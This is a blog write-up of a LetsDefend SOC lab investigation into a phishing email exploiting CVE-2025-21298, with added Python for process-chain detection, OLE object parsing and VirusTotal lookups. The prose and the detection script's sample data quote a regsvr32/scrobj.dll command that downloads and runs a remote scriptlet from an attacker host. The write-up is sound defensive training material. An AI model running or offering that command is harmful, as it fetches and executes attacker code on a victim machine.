Investigating CVE-2025-21298: Zero-Click OLE Exploitation in a Targeted Attack

Rahul Shah
6 min read · Feb 13, 2025


https://www.offsec.com/blog/cve-2025-21298/

CVE-2025-21298 is a critical zero-click vulnerability in Windows OLE (Object Linking and Embedding), a technology that allows objects like images, charts, and other content to be embedded and linked within documents. This flaw enables attackers to execute malicious code on a victim’s system without requiring any user interaction, making it particularly dangerous.

The issue originates from a memory corruption vulnerability in the ole32.dll library, a core component that handles object linking and embedding in Windows. Specifically, the vulnerability is triggered when OLE objects are embedded in documents like Rich Text Format (RTF) files.

When a victim opens or even previews a malicious RTF file containing an embedded OLE object, the flaw is triggered. This leads to a buffer overflow or use-after-free condition in ole32.dll, allowing the attacker to corrupt the victim’s process memory and execute arbitrary code. The attacker could then take full control of the system, install malware, or exfiltrate sensitive data.

Investigation of the Alert from LetsDefend

Let’s begin investigating the alert from LetsDefend.

Alert

The alert shows that on February 4, 2025, at 4:18 PM, an email was received by Austin@letsdefend.io from projectmanagement@pm.me. The email contained an attachment that was flagged as malicious by security monitoring systems. This suggests the attachment may be carrying harmful content such as malware, exploit code, or other malicious payloads designed to compromise the recipient’s system.

Let’s query the IP address in the built-in threat intelligence feed, and we can see that it is flagged as malicious.

LetsDefend’s Threat intelligence

This indicates that the IP address has been previously associated with suspicious or harmful activities.

Further Examination of the Email Sent to Austin

Let’s take a closer look at the email that was sent to Austin.

Received Email

The email includes an attachment that is available for download. This provides an opportunity to investigate the file further. Before we conduct a detailed analysis of the attachment, we’ll perform some initial incident analysis to understand the context and identify potential risks.

Checking Executed Commands on Austin’s Endpoint

Command history

The executed command reveals that regsvr32.exe, a trusted Windows utility, was used to download and execute a remote script (shell.sct) from http://84.38.130.118.com, with the scrobj.dll library handling script execution. This is a common technique in fileless malware attacks: the malicious code runs directly in memory, bypassing traditional file-based security controls. To reconstruct the chain of events leading to this suspicious command, we look at the process history: Outlook initiated the chain, with cmd.exe as the parent process that executed the command:

"C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:http://84.38.130.118.com/shell.sct scrobj.dll"
Process history

This is highly suspicious, as it involves CMD executing regsvr32.exe, a legitimate Windows utility typically used to register or unregister DLL files. However, in this case, it is used with unusual arguments:

  • /s (silent mode) to suppress prompts.
  • /u (unregister) flag, which is typically used to unregister a DLL.
  • /i:http://84.38.130.118.com/shell.sct points to an external shell.sct script hosted on a remote server, suggesting a download attempt of potentially malicious content.
  • scrobj.dll, a Windows scripting library, is involved, indicating that the downloaded script might be executed by leveraging this DLL for automation or script execution.

Following this, regsvr32.exe is spawned by cmd.exe; it downloads the shell.sct script from the specified URL and executes it through the scrobj.dll library. This sequence could enable the execution of malicious code, leading to further exploitation. The use of regsvr32.exe to execute external scripts is a well-known tactic (T1218, T1059.004, T1071.001) leveraged in malicious campaigns to bypass security filters. Since regsvr32.exe is a trusted system utility typically used for registering and unregistering DLLs, it is often whitelisted by security tools. This makes it a favored method for attackers to carry out their operations without raising alarms, even though the process is being abused for malicious purposes.
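The process chain above is easy to hunt for in process-creation telemetry. The following script is an added example (not from the original post or from LetsDefend): it runs a small set of rules over constructed Sysmon-style process-creation records, including the exact command line quoted above, and reports why each suspicious event was flagged. Field names, the sample events, and the Office and shell executable lists are my assumptions, not data from the incident.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation record (the fields a Sysmon Event ID 1 or EDR log carries)."""
    parent_image: str
    image: str
    command_line: str


# Constructed sample events. Events 0 and 1 reproduce the Outlook -> cmd.exe -> regsvr32.exe
# chain and the command line quoted in the post; events 2 and 3 are benign look-alikes.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
                 r"C:\Windows\System32\cmd.exe",
                 r'"C:\Windows\System32\cmd.exe" /c regsvr32.exe /s /u /i:http://84.38.130.118.com/shell.sct scrobj.dll'),
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\regsvr32.exe",
                 r"regsvr32.exe /s /u /i:http://84.38.130.118.com/shell.sct scrobj.dll"),
    ProcessEvent(r"C:\Windows\System32\msiexec.exe",
                 r"C:\Windows\System32\regsvr32.exe",
                 r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /c dir /s C:\Users\austin\Documents"),
]

# Assumed lists: Office applications that rarely need a shell child, and the shells/script
# hosts whose appearance under an Office parent is worth a look.
OFFICE_APPS = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# A /i: argument whose value is a URL rather than a local path.
REMOTE_INSTALL = re.compile(r'^/i:["\']?(https?|ftp)://', re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze_event(ev: ProcessEvent) -> list[str]:
    """Return the reasons this event looks like regsvr32 scriptlet abuse (empty list = nothing found)."""
    reasons = []
    lowered = [t.lower() for t in ev.command_line.split()]
    flags = {t for t in lowered if t.startswith("/")}

    if basename(ev.parent_image) in OFFICE_APPS and basename(ev.image) in SHELLS:
        reasons.append(f"{basename(ev.parent_image)} spawned {basename(ev.image)}")

    if any("regsvr32" in t for t in lowered):
        if any(REMOTE_INSTALL.match(t) for t in lowered):
            reasons.append("regsvr32 /i: argument is a remote URL (scriptlet fetched over the network)")
        if "scrobj.dll" in ev.command_line.lower():
            reasons.append("regsvr32 loading scrobj.dll (scriptlet execution)")
        if {"/s", "/u"} <= flags and any(t.startswith("/i:") for t in flags):
            reasons.append("/s and /u combined with /i: (silent, no registration left behind)")
    return reasons


def hunt(events: list[ProcessEvent]) -> dict[int, list[str]]:
    """Map the index of every flagged event to its list of reasons."""
    hits = {}
    for i, ev in enumerate(events):
        reasons = analyze_event(ev)
        if reasons:
            hits[i] = reasons
    return hits


if __name__ == "__main__":
    for idx, reasons in hunt(SAMPLE_EVENTS).items():
        ev = SAMPLE_EVENTS[idx]
        print(f"[!] event {idx}: {basename(ev.parent_image)} -> {basename(ev.image)}")
        for r in reasons:
            print(f"    - {r}")
```

Events 0 and 1 are flagged (Office parent spawning a shell, remote scriptlet URL, scrobj.dll, and the /s /u /i: combination); the vendor installer using regsvr32 with a local DLL and the plain `dir` command are not, which is the distinction a rule like this needs to make to stay useful in a real environment.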

The log management data shows that the web request fetching the shell.sct script was permitted, meaning Austin’s endpoint was able to download the malicious script from the remote server.

Log Management

Analysis of the Malicious Attachment

To ensure a safe and controlled environment for analysis, I utilized the sandbox provided by LetsDefend to open the file and examine its contents.

Malicious RTF File

Using rtfobj to Examine Embedded Objects

rtfobj is a specialized tool for analyzing and extracting embedded objects from Rich Text Format (RTF) files. RTF files often contain embedded objects, including OLE objects, images, scripts, and macros, which can be used to deliver malicious payloads or exploits.

In this case, we used rtfobj to analyze the embedded object within the attachment. This tool helps us understand what is embedded within the RTF file and whether any malicious payloads are present.

OLE Object Details

The response from rtfobj provides important details about the embedded OLE object in the mail.rtf file:

  • Format ID: 2 (Embedded): This indicates that the object is embedded within the RTF file rather than linked externally.
  • Class Name: StaticDib: This suggests that the object is an embedded image object (device-independent bitmap), which is commonly used in Microsoft Office and RTF files.
  • Data Size: 4 bytes: The actual binary data embedded in the object is very small (4 bytes), which could indicate a small payload, command, or identifier for further exploitation.
  • MD5 Hash: The MD5 hash f1d3ff8443297732862df21dc4e57262 is associated with the object. We can use this hash to check if it matches any known malicious payloads or samples in security databases (e.g., VirusTotal).
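To show where the four fields above come from, here is an added example (my code, not rtfobj or the post’s analysis) that does the core of what rtfobj does for an embedded object: it pulls the hex payload out of the `\*\objdata` group of an RTF file, decodes it, and walks the OLE 1.0 object header (version, Format ID, class name, then the native data size and bytes) to report the format, class name, data size and MD5. The sample RTF is constructed for the demonstration and is not the mail.rtf attachment; only the embedded case (Format ID 2) is fully parsed.

```python
import hashlib
import re
import struct
from dataclasses import dataclass

# Constructed sample RTF (not the mail.rtf attachment from the post). It embeds one
# OLE 1.0 object: class name "StaticDib", Format ID 2 (embedded), four null bytes of data.
SAMPLE_RTF = rb"""{\rtf1\ansi
{\object\objemb{\*\objclass StaticDib}{\*\objdata
01050000 02000000 0a000000 53746174 69634469 6200
00000000 00000000 04000000 00000000
}}}"""

OLE1_VERSION = 0x00000501  # OLEVersion field of every OLE 1.0 object header


@dataclass
class Ole1Object:
    format_id: int      # 1 = linked, 2 = embedded
    class_name: str
    data: bytes         # NativeData (empty for non-embedded objects in this parser)

    @property
    def md5(self) -> str:
        return hashlib.md5(self.data).hexdigest()


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


OBJDATA_RE = re.compile(rb"\\\*\\objdata\s*([0-9A-Fa-f\s]+)\}")


def extract_objdata(rtf: bytes) -> list[bytes]:
    """Hex-decode every \\*\\objdata group; whitespace and newlines inside the hex are ignored."""
    blobs = []
    for match in OBJDATA_RE.finditer(rtf):
        hexdigits = re.sub(rb"\s+", b"", match.group(1))
        blobs.append(bytes.fromhex(hexdigits.decode("ascii")))
    return blobs


def _read_u32(buf: bytes, off: int) -> tuple[int, int]:
    return struct.unpack_from("<I", buf, off)[0], off + 4


def _read_lp_string(buf: bytes, off: int) -> tuple[str, int]:
    """LengthPrefixedAnsiString: u32 length (including the NUL terminator), then the bytes."""
    length, off = _read_u32(buf, off)
    raw = buf[off:off + length]
    return raw.rstrip(b"\x00").decode("latin-1"), off + length


def parse_ole1(blob: bytes) -> Ole1Object:
    version, off = _read_u32(blob, 0)
    if version != OLE1_VERSION:
        raise ValueError(f"unexpected OLE version {version:#010x}")
    format_id, off = _read_u32(blob, off)
    class_name, off = _read_lp_string(blob, off)
    _topic_name, off = _read_lp_string(blob, off)
    _item_name, off = _read_lp_string(blob, off)
    data = b""
    if format_id == 2:  # embedded object: NativeDataSize followed by NativeData
        size, off = _read_u32(blob, off)
        data = blob[off:off + size]
        if len(data) != size:
            raise ValueError(f"NativeData truncated: header says {size} bytes, {len(data)} present")
    return Ole1Object(format_id, class_name, data)


def analyze_rtf(rtf: bytes) -> list[Ole1Object]:
    return [parse_ole1(blob) for blob in extract_objdata(rtf)]


def describe(obj: Ole1Object) -> str:
    kind = {1: "Linked", 2: "Embedded"}.get(obj.format_id, "Unknown")
    return (f"Format ID: {obj.format_id} ({kind})\n"
            f"Class Name: {obj.class_name}\n"
            f"Data Size: {len(obj.data)} bytes\n"
            f"MD5: {obj.md5}")


if __name__ == "__main__":
    for i, obj in enumerate(analyze_rtf(SAMPLE_RTF)):
        print(f"--- object {i} ---")
        print(describe(obj))
```

The size check in `parse_ole1` matters in practice: a header that claims more native data than is present is exactly the kind of malformed object exploit documents carry, and a parser that silently returns a short buffer would hide that from the analyst.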

Looking Up Hashes on VirusTotal

I created a script to efficiently check the hashes against VirusTotal for immediate intelligence insights. The hash of the RTF file was flagged by 16 security vendors, indicating it was recognized as malicious. However, the hash of the embedded object was not flagged by any vendors.

malicious rtf hash: 9d68678aeee52684bbe3c983222b1da3

embedded object hash: f1d3ff8443297732862df21dc4e57262

Custom script

To learn more about the script, visit GitHub — PowerShell Security Tools.
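For readers who want to see what such a hash check involves, the following is an added example of my own, not the author’s PowerShell script: it queries the VirusTotal v3 `files/{hash}` endpoint with an API key, reads the `last_analysis_stats` block of the response, and reports the number of engines that called the file malicious, treating a 404 as “never seen”. The two constructed responses stand in for the live API so the script runs offline; their vendor counts mirror the figures in the post (16 for the RTF, none for the object), everything else in them is made up.

```python
import json
import urllib.error
import urllib.request

VT_FILES = "https://www.virustotal.com/api/v3/files/"

# Hashes reported in the post.
RTF_HASH = "9d68678aeee52684bbe3c983222b1da3"
OBJ_HASH = "f1d3ff8443297732862df21dc4e57262"

# Constructed stand-ins for the VirusTotal responses (only the fields this script reads).
# The malicious counts mirror the post; the remaining numbers and names are invented.
SAMPLE_RESPONSES = {
    RTF_HASH: {"data": {"attributes": {
        "last_analysis_stats": {"malicious": 16, "suspicious": 0, "undetected": 50,
                                "harmless": 0, "timeout": 0, "type-unsupported": 4},
        "meaningful_name": "mail.rtf"}}},
    OBJ_HASH: {"data": {"attributes": {
        "last_analysis_stats": {"malicious": 0, "suspicious": 0, "undetected": 62,
                                "harmless": 0, "timeout": 0, "type-unsupported": 8},
        "meaningful_name": "object.bin"}}},
}


def http_fetch(file_hash: str, api_key: str):
    """Live lookup: GET /api/v3/files/{hash}. Returns the parsed JSON, or None on 404 (hash unknown to VT)."""
    req = urllib.request.Request(VT_FILES + file_hash,
                                 headers={"x-apikey": api_key, "accept": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=30) as resp:
            return json.load(resp)
    except urllib.error.HTTPError as exc:
        if exc.code == 404:
            return None
        raise


def offline_fetch(file_hash: str, api_key: str):
    """Same contract as http_fetch, served from the constructed responses above."""
    return SAMPLE_RESPONSES.get(file_hash)


def summarize(file_hash: str, report) -> dict:
    """Reduce a /files/{hash} report to the numbers an analyst wants at a glance."""
    if report is None:
        return {"hash": file_hash, "verdict": "unknown", "malicious": 0, "engines": 0, "name": None}
    attrs = report["data"]["attributes"]
    stats = attrs.get("last_analysis_stats", {})
    malicious = stats.get("malicious", 0)
    return {
        "hash": file_hash,
        "verdict": "malicious" if malicious > 0 else "clean",
        "malicious": malicious,
        "engines": sum(stats.values()),
        "name": attrs.get("meaningful_name"),
    }


def check_hashes(hashes, api_key: str, fetch=http_fetch) -> dict:
    """Look up every hash (MD5, SHA-1 or SHA-256 all work with this endpoint) and summarize each."""
    return {h: summarize(h.lower(), fetch(h.lower(), api_key)) for h in hashes}


if __name__ == "__main__":
    # Replace offline_fetch with http_fetch and supply a real key for live lookups.
    for h, r in check_hashes([RTF_HASH, OBJ_HASH], "placeholder-api-key", fetch=offline_fetch).items():
        print(f"{h}  {r['verdict']:9}  {r['malicious']}/{r['engines']} engines  {r['name']}")
```

One caveat that applies to the object hash above: a hash of a 4-byte blob matches every other file made of those same four bytes, so a zero-detection result for it carries little weight either way, and the RTF container is the artifact whose verdict counts.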

In this investigation, we analyzed an attack leveraging a zero-click vulnerability (CVE-2025-21298) to exploit Windows OLE technology. Through careful examination of the email, attachments, and executed commands, we identified the use of regsvr32.exe for downloading and executing a malicious script. Our findings highlight the effectiveness of using legitimate system processes in evading detection.
